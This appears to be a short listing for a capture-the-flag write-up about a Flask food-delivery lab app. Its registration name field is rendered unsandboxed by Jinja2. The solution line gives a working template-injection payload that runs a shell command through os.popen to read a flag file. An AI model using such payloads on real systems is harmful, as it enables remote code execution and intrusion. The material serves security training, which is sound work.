[web][Pro][medium]
QuickBite — SSTI via Registration Name Field
hackadvisor
Task: Flask food delivery app with user registration; the first_name field is passed to Jinja2 render_template_string() unsandboxed in the profile welcome banner.

Solution: Registered a user with {{lipsum.__globals__['os'].popen('cat /root/flag.txt').read()}} as first_name, then visited /profile to trigger SSTI → RCE.
Tags / techniques:
- ssti_jinja2
- render_template_string_abused
- decoy_flag_recognition
- rce_via_lipsum_globals_os_popen
- user_registration_injection
Full writeup: Pro tier only (sign-in required).
Similar writeups
- [web][Pro] Lab 237 — MailCraft — SSTI in Email Template Preview — hackadvisor
- [web][Pro] Состояние 0x7F (State 0x7F) — hackerlab
- [web][Pro] Dosie X (Dossier X) — hackerlab
- [web][Pro] MailPilot — SSTI in Template Preview — hackadvisor
- [web][Pro] Lab 389 — PulseBoard — SSTI in Custom Widget Template Builder — hackadvisor